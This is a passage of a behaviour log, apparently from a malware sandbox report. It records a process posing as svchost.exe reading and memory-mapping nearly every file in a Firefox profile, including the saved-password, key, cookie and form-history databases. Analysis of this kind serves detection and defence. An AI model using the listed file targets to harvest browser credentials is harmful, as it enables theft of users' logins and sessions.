| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\.metadata, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\.metadata, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\.metadata, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\.metadata, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\.metadata, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\marionette.log, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\marionette.log, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\marionette.log, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\marionette.log, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\marionette.log, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\marionette.log, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\mimeTypes.rdf, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\mimeTypes.rdf, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\mimeTypes.rdf, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\mimeTypes.rdf, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\mimeTypes.rdf, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\mimeTypes.rdf, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\parent.lock, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\parent.lock, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\parent.lock, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\parent.lock, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\parent.lock, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\permissions.sqlite, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\permissions.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\permissions.sqlite, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\permissions.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\permissions.sqlite, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\permissions.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\pluginreg.dat, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\pluginreg.dat, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\pluginreg.dat, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\pluginreg.dat, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\pluginreg.dat, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\pluginreg.dat, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\search.json, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\search.json, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\search.json, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\search.json, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\search.json, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\search.json, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\secmod.db, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\secmod.db, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\secmod.db, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\secmod.db, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\secmod.db, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\secmod.db, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.bak, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.bak, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.bak, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.bak, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.bak, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.bak, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.js, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.js, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.js, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.js, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.js, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.js, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
